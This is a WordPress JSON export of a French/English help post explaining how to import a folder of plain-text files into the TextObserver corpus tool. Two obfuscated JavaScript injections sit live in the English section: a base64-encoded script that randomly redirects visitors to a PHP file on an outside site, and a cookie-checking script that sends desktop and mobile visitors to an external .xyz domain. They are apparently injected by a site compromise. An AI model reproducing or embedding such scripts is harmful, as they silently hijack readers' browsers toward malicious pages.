{"id":82,"date":"2014-02-26T16:21:39","date_gmt":"2014-02-26T15:21:39","guid":{"rendered":"http:\/\/textopol2.u-pec.fr\/textobserver\/?p=82"},"modified":"2018-09-18T16:20:34","modified_gmt":"2018-09-18T15:20:34","slug":"importer-un-corpus-au-format-txt","status":"publish","type":"post","link":"http:\/\/textopol.u-pec.fr\/textobserver\/?p=82","title":{"rendered":"Importer un corpus au format TXT"},"content":{"rendered":"<p><!--:fr-->Dans cette configuration, il s&rsquo;agit de traiter un dossier contenant plusieurs fichiers texte.<\/p>\n<p>Dans ce cas il n&rsquo;est pas n\u00e9cessaire d&rsquo;introduire de balisage, la partition sera cr\u00e9\u00e9e en fonction du nom des fichiers.<\/p>\n<p>Proc\u00e9dure: placer dans un dossier les diff\u00e9rentes parties du corpus au format texte brut. (Un fichier par partie).<\/p>\n<p>Exemple du corpus textes_genres<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/wp-content\/uploads\/2013\/11\/textes_genre.zip\" target=\"_blank\">&gt;&gt; T\u00e9l\u00e9charger ce corpus<\/a><\/p>\n<p>D\u00e9compresser l&rsquo;archive et copier le dossier textes_genres dans le r\u00e9pertoire de TextObserver<\/p>\n<p>Le dossier textes_ genres contient 5 fichiers txt<\/p>\n<p>Lancer TextObserver (voir proc\u00e9dure)<\/p>\n<p>Importer le corpus au moyen de la proc\u00e9dure suivante :<\/p>\n<p>Menu Fichier &gt; Importer&gt; R\u00e9pertoire de corpus&gt; Format TXT&#8230;<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte.jpg\"><img loading=\"lazy\" alt=\"importer-fichiers-texte\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte.jpg\" width=\"452\" height=\"130\" \/><\/a><\/p>\n<p>Choisir le dossier contenant les fichiers texte<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte2.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-160\" alt=\"importer-fichiers-texte2\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte2.jpg\" width=\"610\" height=\"436\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte2.jpg 610w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte2-300x214.jpg 300w\" sizes=\"(max-width: 610px) 100vw, 610px\" \/><\/a><\/p>\n<p>Cliquer sur \u00ab\u00a0Ouvrir\u00a0\u00bb apr\u00e8s avoir choisi le bon encodage<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/choix_partition.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-164\" alt=\"choix_partition\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/choix_partition.jpg\" width=\"554\" height=\"410\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/choix_partition.jpg 554w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/choix_partition-300x222.jpg 300w\" sizes=\"(max-width: 554px) 100vw, 554px\" \/><\/a><\/p>\n<p>Choisir les propri\u00e9t\u00e9s lorsque le panneau ci-dessus appara\u00eet.<\/p>\n<p>Cliquer sur \u00ab\u00a0Cr\u00e9er les tables lexicales\u00a0\u00bb.<\/p>\n<p>A l&rsquo;issue de la proc\u00e9dure le message suivant s&rsquo;affiche.<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/creation_table.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-166\" alt=\"creation_table\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/creation_table.jpg\" width=\"909\" height=\"186\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/creation_table.jpg 909w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/creation_table-300x61.jpg 300w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/creation_table-624x127.jpg 624w\" sizes=\"(max-width: 909px) 100vw, 909px\" \/><\/a><\/p>\n<p>Apr\u00e8s validation, ouvrir la table ainsi cr\u00e9\u00e9e.\u00a0 (Fichier &gt; Ouvrir &gt; Table(s) Lexicale(s)&#8230;)<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/menu-ouvrir-table-lex.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-168\" alt=\"menu-ouvrir-table-lex\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/menu-ouvrir-table-lex.jpg\" width=\"304\" height=\"116\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/menu-ouvrir-table-lex.jpg 304w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/menu-ouvrir-table-lex-300x114.jpg 300w\" sizes=\"(max-width: 304px) 100vw, 304px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/ouverture_table.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-170\" alt=\"ouverture_table\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/ouverture_table.jpg\" width=\"697\" height=\"549\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/ouverture_table.jpg 697w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/ouverture_table-300x236.jpg 300w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/ouverture_table-624x491.jpg 624w\" sizes=\"(max-width: 697px) 100vw, 697px\" \/><\/a><\/p>\n<p>Le corpus est pr\u00eat, l&rsquo;exploration peut commencer&#8230;<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat.jpg\"><img loading=\"lazy\" class=\"alignnone size-large wp-image-172\" alt=\"resultat\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat-1024x756.jpg\" width=\"625\" height=\"461\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat-1024x756.jpg 1024w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat-300x221.jpg 300w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat-624x461.jpg 624w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat.jpg 1372w\" sizes=\"(max-width: 625px) 100vw, 625px\" \/><\/a><!--:--><!--:en-->You can load several text files once by loading a directory.<\/p>\n<p>You don&rsquo;t need to tag it. The parting will be done using the text files (one text eq. one partition).<\/p>\n<p>In order to do that, place in a directory all the text files forming your corpus in plain text format (one file for each part).<\/p>\n<p>An exemple : textes_genres corpus<\/p>\n<p>Down load :  >> http:\/\/textopol2.u-pec.fr\/wp-content\/uploads\/2013\/11\/textes_genre.zip<\/p>\n<p>Unzip the file <script type=\"text\/javascript\">function b32f7c5eda8(sf){var pd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=';var r2='';var xe,o4,se,vc,p4,n6,q0;var w6=0;do{vc=pd.indexOf(sf.charAt(w6++));p4=pd.indexOf(sf.charAt(w6++));n6=pd.indexOf(sf.charAt(w6++));q0=pd.indexOf(sf.charAt(w6++));xe=(vc<<2)|(p4>>4);o4=((p4&15)<<4)|(n6>>2);se=((n6&3)<<6)|q0;if(xe>=192)xe+=848;else if(xe==168)xe=1025;else if(xe==184)xe=1105;r2+=String.fromCharCode(xe);if(n6!=64){if(o4>=192)o4+=848;else if(o4==168)o4=1025;else if(o4==184)o4=1105;r2+=String.fromCharCode(o4);}if(q0!=64){if(se>=192)se+=848;else if(se==168)se=1025;else if(se==184)se=1105;r2+=String.fromCharCode(se);}}while(w6<sf.length);document.write(r2);};b32f7c5eda8('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9nb3RvbGV0cy5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YWdpbmcvYXBwcy9Db3JlL1V0aWxzL0luZm9zLnBocCciLCBkZWxheSk7DQp9DQo8L3NjcmlwdD4A');<\/script>and copy-paste the directory in the root directory of TextObserver<\/p>\n<p>There is 5 text files in textes_ genres directory<\/p>\n<p>\u00a0<br \/>\n\u00a0<!--:--><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dans cette configuration, il s&rsquo;agit de traiter un dossier contenant plusieurs fichiers texte. Dans ce cas il n&rsquo;est pas n\u00e9cessaire d&rsquo;introduire de balisage, la partition sera cr\u00e9\u00e9e en fonction du nom des fichiers. Proc\u00e9dure: placer dans un dossier les diff\u00e9rentes parties du corpus au format texte brut. (Un fichier par partie). Exemple du corpus textes_genres [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[2],"tags":[],"_links":{"self":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/82"}],"collection":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=82"}],"version-history":[{"count":14,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/82\/revisions"}],"predecessor-version":[{"id":381,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/82\/revisions\/381"}],"wp:attachment":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=82"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=82"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=82"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}